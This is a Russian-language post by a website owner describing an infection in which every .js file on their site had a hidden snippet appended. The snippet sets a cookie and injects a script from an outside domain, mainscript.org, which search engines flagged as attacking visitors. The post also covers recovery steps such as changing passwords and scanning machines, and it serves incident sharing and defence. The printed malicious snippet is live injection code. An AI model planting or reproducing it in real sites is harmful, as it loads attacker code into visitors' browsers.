Имеется информация, что эта веб-страница атакует компьютеры
За последнюю неделю потратил много времени на восстановление работоспособности сайта.
В один "прекрасный" день перестали работать скрипты сайта, поисковые системы google и yandex нашли на сайте код который по их мнению атакует компьютеры пользователей. (См. изображение)
На самом деле так оно и было.
Сначала я просканировал сайт одним из бесплатных сервисов в интернете:
Как видно из скрина, у меня есть список файлов на которые ругается гугл. Вот их я и стал смотреть.
В итоге выяснилось, что во всех файлах с расширением *.js в самом низу прописан такой код:
function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://mainscript.org/mainscript.js"></script>');}
Видно, что в коде присутствует ссылка на сайт, который гугл не рекомендует посещать.
В интернете ничего не нашел по этому поводу, только одну статью о заражении файлов скриптов. Видимо это что-то новенькое.
Несколько раз возвращал копию сайта, но эти симптомы провторялись через день или два.
Хостинг поддержка посоветовала поменять все пароли: ftp, администратора сайта, пароль на web shell., а так же проверить все компьютеры с которых производилась работа с сайтов антивирусными программами.
Сейчас пока сайт работает.... Надеюсь это не повторится.
Хочется отметить, что при входе на данный сайт на некоторых компьютерах так и пишется предупреждение. Связано это скорее с тем, что google еще не проверил заново сайт (повторную проверку я запросил в инструментах веб разработчика Google).
У кого были такие проблемы и есть решение, как удалять ненужные строки из js файлов прошу поделится знаниями...